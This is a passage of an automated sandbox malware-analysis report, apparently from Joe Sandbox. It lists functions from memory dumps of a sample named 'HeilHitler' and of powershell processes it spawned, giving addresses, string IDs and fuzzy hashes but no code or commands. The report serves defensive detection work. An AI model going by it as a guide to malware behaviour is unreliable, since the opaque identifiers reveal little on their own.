                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FeaturePresentProcessorcapture_previous_context
                                                                                                                                                                                                                                            • String ID: _/yZ_&
                                                                                                                                                                                                                                            • API String ID: 3936158736-2545492802
                                                                                                                                                                                                                                            • Opcode ID: 935020ce459c276dd974af6d112d96968beece1e2f635116ef2f32d11577830a
                                                                                                                                                                                                                                            • Instruction ID: 751945263df847d3f5981b4db20ae78c53b958117ca9646a57799d6d8ddee9b6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 935020ce459c276dd974af6d112d96968beece1e2f635116ef2f32d11577830a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42211565B1CB0681EB48AB04E871BA533A0FB84344F9005B5D9AE833E9EF3EA445C710
                                                                                                                                                                                                                                            Function 00007FF633D6FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                            • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                            • Instruction ID: 761cba639d03aea86463388cd1ad425dde15df9ba6ee47ac9c00dac230985bb0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A115B32608B8182EB218F55E400269B7E8FB88B98F584330EF9D5B769DF3CE5518B00
                                                                                                                                                                                                                                            Function 00007FFDFAD62AAF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FeaturePresentProcessorcapture_previous_context
                                                                                                                                                                                                                                            • String ID: _/yZ_&
                                                                                                                                                                                                                                            • API String ID: 3936158736-2545492802
                                                                                                                                                                                                                                            • Opcode ID: 57662b103b31dcb68621f42d09298142627021673d1d758453386178e6d091d8
                                                                                                                                                                                                                                            • Instruction ID: 931c2b580d7e535fc72d1067fb83a277f75332a0b0d0fdb81fee83fc31f3fd6e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 57662b103b31dcb68621f42d09298142627021673d1d758453386178e6d091d8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB110475B2CB0A81EB48AB04E860BA577A4FB84344F5015B5D9AE873E9EF3EE445C710
                                                                                                                                                                                                                                            Function 00007FF633D8073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                            • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                            • Instruction ID: 09a25edd1726398f407d017423dcdbbfe3ab10e57d17ce13637819520ad46471
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F01A26291C30386F720AFE0A86327E63A0EF48744F801236D55DEA795EF3CE544AB14
                                                                                                                                                                                                                                            Function 00007FFDFAE86FB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$System$File
                                                                                                                                                                                                                                            • String ID: gfff
                                                                                                                                                                                                                                            • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                            • Opcode ID: 38bc638285714f8673654ce0a6927bc61df2c2199d4dc0b12482ca57c550bfb1
                                                                                                                                                                                                                                            • Instruction ID: 50061fdd17cef5010d68243691cff8e7e66d8913d4d0d244437064c995684d9f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 38bc638285714f8673654ce0a6927bc61df2c2199d4dc0b12482ca57c550bfb1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B101DBE2B1854582DF64DB29F81155567E0EBCC784B449131FA6DCF799EE2CD145CB00

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00007FFD9AC93428 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: /F^
                                                                                                                                                                                                                                            • API String ID: 0-3479841251
                                                                                                                                                                                                                                            • Opcode ID: 242bb73927777fc8123741619f024639760ca1e02baa843682d08969a787a0da
                                                                                                                                                                                                                                            • Instruction ID: 3706bd76530747ccf0263d5fe73297443cfffb6a37280f298c3b08715eb76cc4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 242bb73927777fc8123741619f024639760ca1e02baa843682d08969a787a0da
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6319337A0D3D15FE3274AB858760A97FE0EF5322470B01FBC4D58B1A7E919580A8761
                                                                                                                                                                                                                                            Function 00007FFD9AD63DB1 Relevance: 1.3, Instructions: 1325COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1843389343.00007FFD9AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ad60000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f714554864aecc260153f7d307e86fe4657869024b15c6db32d24e4e32b7779e
                                                                                                                                                                                                                                            • Instruction ID: e8adba6cbbfcaa630402c197a8e3c8de56d3b954de68efa484964b98cb3ddc49
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f714554864aecc260153f7d307e86fe4657869024b15c6db32d24e4e32b7779e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71821763B0EBC90FE7AA976858655B47FE1EF56220B0911FBD09DC71D3EE18AC068341
                                                                                                                                                                                                                                            Function 00007FFD9AD667F5 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1843389343.00007FFD9AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ad60000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c8e52732fd8a6b7bd690ecbe42788f8634153b04c58328071707ce2a648d2ccf
                                                                                                                                                                                                                                            • Instruction ID: 0630a1a0641d8f543e9b9bc94e597736a0eee8f3e5c1dd3d9c5d9b818316b014
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8e52732fd8a6b7bd690ecbe42788f8634153b04c58328071707ce2a648d2ccf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55D11523A0EA8A0FEB6DABA898755B57BE0EF55314B1801FFD45DC70D3EA19A805C341
                                                                                                                                                                                                                                            Function 00007FFD9AC9A816 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f9af5c77d1755fca45533df992584f34bab5aa384b07ac549d7a588315d330bc
                                                                                                                                                                                                                                            • Instruction ID: b2155ca60eccca588ed9aaea4edc263c766707a3bdbf93e9ee63b6d9bd93b529
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9af5c77d1755fca45533df992584f34bab5aa384b07ac549d7a588315d330bc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F831E93190D7C88FE7569BB898596A97FF0DF97320F0941EFC048C71A7DA68540AC752
                                                                                                                                                                                                                                            Function 00007FFD9AC99880 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: ff1fa48d92a7a32a6dab769dc0d2835d3124d04a6a99e1ceeef992504b7e285d
                                                                                                                                                                                                                                            • Instruction ID: 05501940ea198986ed40afd78a65169a2a636517c176cddf805c9d839edb55c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff1fa48d92a7a32a6dab769dc0d2835d3124d04a6a99e1ceeef992504b7e285d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7310931A1CB484FDB1C9B5C9C466B97BF0FB99310F04426FE459D3292CA70A815CBC2
                                                                                                                                                                                                                                            Function 00007FFD9AB7E380 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841048778.00007FFD9AB7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB7D000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ab7d000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: b26fc4cb9d255378ce47aa9b0f754cc0fea2f7ee98f97ee94ff34e16b8e1cb91
                                                                                                                                                                                                                                            • Instruction ID: 33f5b0e9545d3dd2e240a5310df448735f6eaf2ee026e13b03b87939a057059f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b26fc4cb9d255378ce47aa9b0f754cc0fea2f7ee98f97ee94ff34e16b8e1cb91
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F412A7150DBC44FE75A8B2898559523FF0FF52318B1905EFD08CCB5A3DA25B846C792
                                                                                                                                                                                                                                            Function 00007FFD9AD6429F Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1843389343.00007FFD9AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ad60000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1c06a70fe52bdc1d6c7e729d1a118694b0543f2c87fa14000fdf682b19f13dcc
                                                                                                                                                                                                                                            • Instruction ID: 28880b71c2e3c0d657577ea7a4a050137fadc286838b7516667b551bfc0e084a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c06a70fe52bdc1d6c7e729d1a118694b0543f2c87fa14000fdf682b19f13dcc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F321F263B5EA874FE7BDDA68956117436C1EF94220B6920FAD05EC3192EE18EC008301
                                                                                                                                                                                                                                            Function 00007FFD9AD6459C Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1843389343.00007FFD9AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ad60000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c3623a56cde72aaabf2761740d7503b7454d46f747e91277bb9be2c9252a8614
                                                                                                                                                                                                                                            • Instruction ID: 671952a925bd7ee1417b24c532e9af7ad26fc81c934bbd11c85257823ae45679
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3623a56cde72aaabf2761740d7503b7454d46f747e91277bb9be2c9252a8614
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD11C273F0E6864FE7B9D7AC95706B47BD0EF05220B5910FAD06DC7096EA19AC048341
                                                                                                                                                                                                                                            Function 00007FFD9AC933B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                            • Instruction ID: a5f17bad871621e14cb7fe71e574200b6c9bd4a44935e4134c7ef33be96b6135
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E401A73124CB0C4FD748EF0CE051AA5B3E0FB85320F10056DE58AC3695DB32E882CB45
                                                                                                                                                                                                                                            Function 00007FFD9AC9A1F3 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 62b22bd3904e7e9b078f00f090f48a220d18b4255540163dc55495c244192f83
                                                                                                                                                                                                                                            • Instruction ID: 5eb9f6d05fef8e7933e91e79e3e3aaedf76681fb4bf6550818f96d0af60ffcdd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62b22bd3904e7e9b078f00f090f48a220d18b4255540163dc55495c244192f83
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0001817A90EBC94FDB579F2898750987FB0EF6620170902DBD098CB0A3E6659908C792

                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                            Function 00007FFD9AC98765 Relevance: 8.8, Strings: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: M_^$M_^$M_^$M_^$M_^$M_^$M_^
                                                                                                                                                                                                                                            • API String ID: 0-3904786266
                                                                                                                                                                                                                                            • Opcode ID: 62a1ff498abc061122313bf249bdf9155b1d656eca352150b7fb9c41c8f7bd70
                                                                                                                                                                                                                                            • Instruction ID: 95e8481cc3dc03f09f5062f3aa758ba99c3c7cc161dd46cb40a196c3438688ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62a1ff498abc061122313bf249bdf9155b1d656eca352150b7fb9c41c8f7bd70
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB215366D0DAC18EE36B626558B81A43BE05F92344F4E51FBD4B89B1E7F809580D8392
                                                                                                                                                                                                                                            Function 00007FFD9AC98BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                                                                                                                                                            • API String ID: 0-1500707516
                                                                                                                                                                                                                                            • Opcode ID: d80d34d9bc5ae39b6e4c6805338084298f4a25165cf5b2188607347adce72b21
                                                                                                                                                                                                                                            • Instruction ID: ec08b0e42df8aefe4e0fdd4c938956361d09831a89bba499b64af5c36ab90da1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d80d34d9bc5ae39b6e4c6805338084298f4a25165cf5b2188607347adce72b21
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E210777704465DED30576ADB8189DC73C0DBA427638A47F3E169CB583ED14A09746C4
                                                                                                                                                                                                                                            Function 00007FFD9AC984FA Relevance: 6.3, Strings: 5, Instructions: 33COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: M_^$M_^$M_^$M_^$M_^
                                                                                                                                                                                                                                            • API String ID: 0-2396788759
                                                                                                                                                                                                                                            • Opcode ID: 2dc90a3df7b6a3df4f3b43745f1057276d20ddc9cf260df4ccf4bef733ff90c6
                                                                                                                                                                                                                                            • Instruction ID: 14646979f294268459c11048856388c7c07f50acf3c0ad2071ef91aa0fe03cc8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2dc90a3df7b6a3df4f3b43745f1057276d20ddc9cf260df4ccf4bef733ff90c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8F08C62E0D6C2CAF35B526408BC1842FD12F92354B4E41FBD0BC9B0A7A819980A82A5

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 00007FFD9ACB4C3D Relevance: 1.6, Strings: 1, Instructions: 367COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.1899344146.00007FFD9ACB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ACB0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_7ffd9acb0000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ^
                                                                                                                                                                                                                                            • API String ID: 0-1590793086
                                                                                                                                                                                                                                            • Opcode ID: d472b86d934421fb196552c218afd9eaf5ef42dfc4cf0f891462a0f3232d0671
                                                                                                                                                                                                                                            • Instruction ID: 5083e60bec560f96851b7e57cb38be7a043b03167e64a6ada1fb39e457d9a156
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d472b86d934421fb196552c218afd9eaf5ef42dfc4cf0f891462a0f3232d0671
